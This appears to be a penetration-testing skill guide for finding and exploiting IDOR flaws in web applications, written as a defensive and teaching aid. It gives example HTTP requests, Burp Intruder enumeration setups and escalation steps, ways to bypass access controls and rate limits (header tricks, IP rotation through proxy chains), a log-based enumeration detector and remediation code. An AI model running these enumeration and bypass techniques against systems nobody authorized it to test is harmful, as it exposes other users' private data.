idor-testing

IDOR Vulnerability Testing

Purpose

Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. This skill covers both database object references and static file references, detection techniques using parameter manipulation and enumeration, exploitation via Burp Suite, and remediation strategies for securing applications against unauthorized access.

Inputs / Prerequisites

  • Target Web Application: URL of application with user-specific resources
  • Multiple User Accounts: At least two test accounts to verify cross-user access
  • Burp Suite or Proxy Tool: Intercepting proxy for request manipulation
  • Authorization: Written permission for security testing
  • Understanding of Application Flow: Knowledge of how objects are referenced (IDs, filenames)

Outputs / Deliverables

  • IDOR Vulnerability Report: Documentation of discovered access control bypasses
  • Proof of Concept: Evidence of unauthorized data access across user contexts
  • Affected Endpoints: List of vulnerable API endpoints and parameters
  • Impact Assessment: Classification of data exposure severity
  • Remediation Recommendations: Specific fixes for identified vulnerabilities

Core Workflow

1. Understand IDOR Vulnerability Types

Direct Reference to Database Objects

Occurs when applications reference database records via user-controllable parameters:
```text
# Original URL (authenticated as User A)
example.com/user/profile?id=2023

# Manipulation attempt (accessing User B's data)
example.com/user/profile?id=2022
```

Direct Reference to Static Files

Occurs when applications expose file paths or names that can be enumerated:
```text
# Original URL (User A's receipt)
example.com/static/receipt/205.pdf

# Manipulation attempt (User B's receipt)
example.com/static/receipt/200.pdf
```

2. Reconnaissance and Setup

Create Multiple Test Accounts

```text
Account 1: "attacker" - Primary testing account
Account 2: "victim"   - Account whose data we attempt to access
```

Identify Object References

Capture and analyze requests containing:
  • Numeric IDs in URLs:
    /api/user/123
  • Numeric IDs in parameters:
    ?id=123&action=view
  • Numeric IDs in request body:
    {"userId": 123}
  • File paths:
    /download/receipt_123.pdf
  • GUIDs/UUIDs:
    /profile/a1b2c3d4-e5f6-...

Map User IDs

```text
# Access user ID endpoint (if available)
GET /api/user-id/

# Note ID patterns:
# - Sequential integers (1, 2, 3...)
# - Auto-incremented values
# - Predictable patterns
```

3. Detection Techniques

URL Parameter Manipulation

```text
# Step 1: Capture original authenticated request
GET /api/user/profile?id=1001 HTTP/1.1
Cookie: session=attacker_session

# Step 2: Modify ID to target another user
GET /api/user/profile?id=1000 HTTP/1.1
Cookie: session=attacker_session

# Vulnerable if: Returns victim's data with attacker's session
```

Request Body Manipulation

```text
# Original POST request
POST /api/address/update HTTP/1.1
Content-Type: application/json
Cookie: session=attacker_session

{"id": 5, "userId": 1001, "address": "123 Attacker St"}

# Modified request targeting victim
{"id": 5, "userId": 1000, "address": "123 Attacker St"}
```

HTTP Method Switching

```text
# Original GET request may be protected
GET /api/admin/users/1000 → 403 Forbidden

# Try alternative methods
POST /api/admin/users/1000 → 200 OK (Vulnerable!)
PUT  /api/admin/users/1000 → 200 OK (Vulnerable!)
```

4. Exploitation with Burp Suite

Manual Exploitation

1. Configure the browser to proxy through Burp Suite
2. Log in as the "attacker" user
3. Navigate to a profile/data page
4. Enable Intercept in the Proxy tab
5. Capture a request that carries the user ID
6. Modify the ID to the victim's ID
7. Forward the request
8. Observe whether the response contains the victim's data

Automated Enumeration with Intruder

1. Send request to Intruder (Ctrl+I)
2. Clear all payload positions
3. Select ID parameter as payload position
4. Configure attack type: Sniper
5. Payload settings:
   - Type: Numbers
   - Range: 1 to 10000
   - Step: 1
6. Start attack
7. Analyze responses for 200 status codes
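
Seen from the defender's side, the sequential Numbers sweep configured above leaves a recognisable trail in access logs: one session touching many neighbouring object IDs of the same endpoint within seconds, with 200s interleaved with 403/404 for IDs that do not exist or are not that user's. The following Python is an added example (not part of the original skill) that flags such sessions; the simplified log format, the field names, the session tokens and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log (simplified format, not from any real system):
# one ordinary session and one session sweeping /api/user/profile?id=... the
# way an Intruder "Numbers" payload would (neighbouring IDs, one per second).
SAMPLE_LOG = """\
2024-01-01T10:00:00Z sess=victim_s1 GET /api/user/profile?id=1000 200
2024-01-01T10:00:05Z sess=victim_s1 GET /api/order/77 200
2024-01-01T10:00:10Z sess=attacker_s9 GET /api/user/profile?id=1001 200
2024-01-01T10:00:11Z sess=attacker_s9 GET /api/user/profile?id=1002 200
2024-01-01T10:00:12Z sess=attacker_s9 GET /api/user/profile?id=1003 403
2024-01-01T10:00:13Z sess=attacker_s9 GET /api/user/profile?id=1004 200
2024-01-01T10:00:14Z sess=attacker_s9 GET /api/user/profile?id=1005 404
2024-01-01T10:00:15Z sess=attacker_s9 GET /api/user/profile?id=1006 200
"""

LINE_RE = re.compile(r"^(\S+) sess=(\S+) ([A-Z]+) (\S+) (\d{3})$")
# Numeric object references: a path segment (/api/order/77) or an id-style
# query parameter (?id=1001, &userId=3).
ID_RE = re.compile(r"(?:/|[?&][A-Za-z_]*[iI]d=)(\d+)(?=[/?&]|$)")

def parse_line(line):
    """Return (timestamp, session, path_template, object_id, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, sess, _method, path, status = m.groups()
    ids = ID_RE.findall(path)
    if not ids:
        return None
    # Generalise the path so ?id=1001 and ?id=1002 fall into the same bucket.
    template = ID_RE.sub(lambda mm: mm.group(0).replace(mm.group(1), "{id}"), path)
    when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return when, sess, template, int(ids[-1]), int(status)

def flag_enumeration(log_text, min_distinct=5, window_seconds=60, min_seq_ratio=0.6):
    """Flag sessions that touch many distinct object IDs of one endpoint inside a
    short window, mostly in steps of one. Returns {session: metrics}."""
    buckets = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            buckets[(rec[1], rec[2])].append(rec)
    flagged = {}
    for (sess, template), recs in buckets.items():
        times = sorted(r[0] for r in recs)
        ids = sorted({r[3] for r in recs})
        if len(ids) < min_distinct or (times[-1] - times[0]).total_seconds() > window_seconds:
            continue
        steps = [b - a for a, b in zip(ids, ids[1:])]
        seq_ratio = sum(1 for s in steps if s == 1) / len(steps)
        if seq_ratio < min_seq_ratio:
            continue
        flagged[sess] = {
            "template": template,
            "distinct_ids": len(ids),
            "sequential_ratio": round(seq_ratio, 2),
            # 403/404 mixed with 200 is the signature of probing unknown IDs
            "denied": sum(1 for r in recs if r[4] in (403, 404)),
        }
    return flagged
```

Tune `min_distinct` and `window_seconds` to the application's normal per-session access pattern; a session viewing a paginated list of its own orders will also touch many IDs, so ownership checks in the application remain the control and this is only the alert.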

Battering Ram Attack for Multiple Positions

```text
# When same ID appears in multiple locations
PUT /api/addresses/§5§/update HTTP/1.1

{"id": §5§, "userId": 3}

# Attack Type: Battering Ram
# Payload: Numbers 1-1000
```

5. Common IDOR Locations

API Endpoints

```text
/api/user/{id}
/api/profile/{id}
/api/order/{id}
/api/invoice/{id}
/api/document/{id}
/api/message/{id}
/api/address/{id}/update
/api/address/{id}/delete
```

File Downloads

```text
/download/invoice_{id}.pdf
/static/receipts/{id}.pdf
/uploads/documents/(unknown)
/files/reports/report_{date}_{id}.xlsx
```

Query Parameters

```text
?userId=123
?orderId=456
?documentId=789
?file=report_123.pdf
?account=user@email.com
```

Quick Reference

IDOR Testing Checklist

| Test | Method | Indicator of Vulnerability |
|---|---|---|
| Increment/Decrement ID | Change `id=5` to `id=4` | Returns different user's data |
| Use Victim's ID | Replace with known victim ID | Access granted to victim's resources |
| Enumerate Range | Test IDs 1-1000 | Find valid records of other users |
| Negative Values | Test `id=-1` or `id=0` | Unexpected data or errors |
| Large Values | Test `id=99999999` | System information disclosure |
| String IDs | Change format: `id=user_123` | Logic bypass |
| GUID Manipulation | Modify UUID portions | Predictable UUID patterns |

Response Analysis

| Status Code | Interpretation |
|---|---|
| 200 OK | Potential IDOR - verify data ownership |
| 403 Forbidden | Access control working |
| 404 Not Found | Resource doesn't exist |
| 401 Unauthorized | Authentication required |
| 500 Error | Potential input validation issue |

Common Vulnerable Parameters

| Parameter Type | Examples |
|---|---|
| User identifiers | `userId`, `uid`, `user_id`, `account` |
| Resource identifiers | `id`, `pid`, `docId`, `fileId` |
| Order/Transaction | `orderId`, `transactionId`, `invoiceId` |
| Message/Communication | `messageId`, `threadId`, `chatId` |
| File references | `filename`, `file`, `document`, `path` |

Constraints and Limitations

Operational Boundaries

  • Requires at least two valid user accounts for verification
  • Some applications use session-bound tokens instead of IDs
  • GUID/UUID references are harder to enumerate but not impossible
  • Rate limiting may restrict enumeration attempts
  • Some IDORs require chained vulnerabilities to exploit

Detection Challenges

  • Horizontal privilege escalation (user-to-user) vs vertical (user-to-admin)
  • Blind IDOR where response doesn't confirm access
  • Time-based IDOR in asynchronous operations
  • IDOR in websocket communications

Legal Requirements

  • Only test applications with explicit authorization
  • Document all testing activities and findings
  • Do not access, modify, or exfiltrate real user data
  • Report findings through proper disclosure channels

Examples

Example 1: Basic ID Parameter IDOR

```text
# Login as attacker (userId=1001)
# Navigate to profile page

# Original request
GET /api/profile?id=1001 HTTP/1.1
Cookie: session=abc123

# Response: Attacker's profile data

# Modified request (targeting victim userId=1000)
GET /api/profile?id=1000 HTTP/1.1
Cookie: session=abc123

# Vulnerable Response: Victim's profile data returned!
```

Example 2: IDOR in Address Update Endpoint

```text
# Intercept address update request
PUT /api/addresses/5/update HTTP/1.1
Content-Type: application/json
Cookie: session=attacker_session

{
  "id": 5,
  "userId": 1001,
  "street": "123 Main St",
  "city": "Test City"
}

# Modify userId to victim's ID
{
  "id": 5,
  "userId": 1000,        # Changed from 1001
  "street": "Hacked Address",
  "city": "Exploit City"
}

# If 200 OK: Address created under victim's account
```

Example 3: Static File IDOR

```text
# Download own receipt
GET /api/download/5 HTTP/1.1
Cookie: session=attacker_session

# Response: PDF of attacker's receipt (order #5)

# Attempt to access other receipts
GET /api/download/3 HTTP/1.1
Cookie: session=attacker_session

# Vulnerable Response: PDF of victim's receipt (order #3)!
```

Example 4: Burp Intruder Enumeration

```text
# Configure Intruder attack
Target: PUT /api/addresses/§1§/update
Payload Position: Address ID in URL and body

Attack Configuration:
  - Type: Battering Ram
  - Payload: Numbers 0-20, Step 1

Body Template: { "id": §1§, "userId": 3 }

# Analyze results:
# - 200 responses indicate successful modification
# - Check victim's account for new addresses
```

Example 5: Horizontal to Vertical Escalation

```text
# Step 1: Enumerate user roles
GET /api/user/1 → {"role": "user", "id": 1}
GET /api/user/2 → {"role": "user", "id": 2}
GET /api/user/3 → {"role": "admin", "id": 3}

# Step 2: Access admin functions with discovered ID
GET /api/admin/dashboard?userId=3 HTTP/1.1
Cookie: session=regular_user_session

# If accessible: Vertical privilege escalation achieved
```

Troubleshooting

Issue: All Requests Return 403 Forbidden

Cause: Server-side access control is implemented

Solution: Try alternative attack vectors:
  1. HTTP method switching (GET → POST → PUT)
  2. Add X-Original-URL or X-Rewrite-URL headers
  3. Try parameter pollution: ?id=1001&id=1000
  4. URL encoding variations: %31%30%30%30 for "1000"
  5. Case variations for string IDs

Issue: Application Uses UUIDs Instead of Sequential IDs

Cause: Randomized identifiers reduce enumeration risk

Solution: UUID discovery techniques:
  1. Check response bodies for leaked UUIDs
  2. Search JavaScript files for hardcoded UUIDs
  3. Check API responses that list multiple objects
  4. Look for UUID patterns in error messages
  5. Try UUID v1 (time-based) prediction if applicable

Issue: Session Token Bound to User

Cause: Application validates session against requested resource

Solution: Advanced bypass attempts:
  1. Test for IDOR in unauthenticated endpoints
  2. Check password reset/email verification flows
  3. Look for IDOR in file upload/download
  4. Test API versioning: /api/v1/ vs /api/v2/
  5. Check mobile API endpoints (often less protected)

Issue: Rate Limiting Blocks Enumeration

Cause: Application implements request throttling

Solution: Bypass techniques:
  1. Add delays between requests (Burp Intruder throttle)
  2. Rotate IP addresses (proxy chains)
  3. Target specific high-value IDs instead of full range
  4. Use different endpoints for same resources
  5. Test during off-peak hours

Issue: Cannot Verify IDOR Impact

Cause: Response doesn't clearly indicate data ownership

Solution: Verification methods:
  1. Create unique identifiable data in victim account
  2. Look for PII markers (name, email) in responses
  3. Compare response lengths between users
  4. Check for timing differences in responses
  5. Use secondary indicators (creation dates, metadata)

Remediation Guidance

Implement Proper Access Control

```python
from django.http import HttpResponseForbidden, JsonResponse
from django.shortcuts import get_object_or_404

# Django example - validate ownership
def update_address(request, address_id):
    address = get_object_or_404(Address, id=address_id)  # 404 on unknown id

    # Verify ownership before allowing update
    if address.user != request.user:
        return HttpResponseForbidden("Unauthorized")

    # Proceed with update: copy only the fields the client may change
    # (model instances have no .update(); request.data is the parsed body, e.g. DRF)
    for field in ("street", "city"):
        if field in request.data:
            setattr(address, field, request.data[field])
    address.save()
    return JsonResponse({"id": address.id})
```

Use Indirect References

```python
from django.http import HttpResponseNotFound, JsonResponse

# Instead of: /api/address/123
# Use:        /api/address/current-user/billing
def get_address(request):
    # Always filter by authenticated user; the client never supplies an id
    address = Address.objects.filter(user=request.user).first()
    if address is None:
        return HttpResponseNotFound()
    return JsonResponse({"street": address.street, "city": address.city})
```

Server-Side Validation

```python
from django.http import FileResponse, HttpResponseNotFound

# Always validate on server, never trust client input
def download_receipt(request, receipt_id):
    receipt = Receipt.objects.filter(
        id=receipt_id,
        user=request.user,  # Critical: filter by current user
    ).first()
    if not receipt:
        # 404 for both "missing" and "not yours": no existence oracle
        return HttpResponseNotFound()

    return FileResponse(receipt.file)
```
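
To make the three remediation rules above concrete and testable outside Django, here is an added example (not part of the original skill) that models, in plain Python with an in-memory store, the vulnerable lookup from Example 3, the owner-scoped lookup of `download_receipt`, and an indirect reference. The `Receipt` and `Response` classes, the "attacker"/"victim" accounts and the `cross_user_check` helper are constructed for this example.

```python
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed in-memory stand-in for the Receipt table (added example, not
# Django). Two test accounts as in the prerequisites: "attacker" and "victim".
@dataclass(frozen=True)
class Receipt:
    id: int
    owner: str
    file: str

RECEIPTS: Dict[int, Receipt] = {
    3: Receipt(3, "victim", "receipt_3.pdf"),
    5: Receipt(5, "attacker", "receipt_5.pdf"),
}

@dataclass(frozen=True)
class Response:
    status: int
    body: Optional[str] = None

def download_receipt_vulnerable(session_user: str, receipt_id: int) -> Response:
    """Looks the object up by the client-supplied id alone (Example 3's IDOR):
    any authenticated session can fetch any receipt."""
    receipt = RECEIPTS.get(receipt_id)
    if receipt is None:
        return Response(404)
    return Response(200, receipt.file)

def download_receipt_secure(session_user: str, receipt_id: int) -> Response:
    """Scopes the lookup to the authenticated user, mirroring
    Receipt.objects.filter(id=receipt_id, user=request.user).first().
    A foreign receipt answers 404, not 403, so the endpoint does not
    confirm which ids exist."""
    receipt = RECEIPTS.get(receipt_id)
    if receipt is None or receipt.owner != session_user:
        return Response(404)
    return Response(200, receipt.file)

def download_latest_receipt(session_user: str) -> Response:
    """Indirect reference: no object id travels in the request; the resource is
    derived from the session, like /api/address/current-user/billing."""
    own = [r for r in RECEIPTS.values() if r.owner == session_user]
    if not own:
        return Response(404)
    return Response(200, max(own, key=lambda r: r.id).file)

def cross_user_check(handler, attacker: str, victim: str) -> bool:
    """Two-account regression check: replay the attacker's session against every
    receipt the victim owns; True means the handler leaks (IDOR present)."""
    victim_ids = [r.id for r in RECEIPTS.values() if r.owner == victim]
    return any(handler(attacker, rid).status == 200 for rid in victim_ids)
```

The `cross_user_check` pattern is what a CI authorization test looks like: run it against every object-referencing endpoint with the two test accounts, and a `True` result fails the build.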

When to Use

This skill is applicable to execute the workflow or actions described in the overview.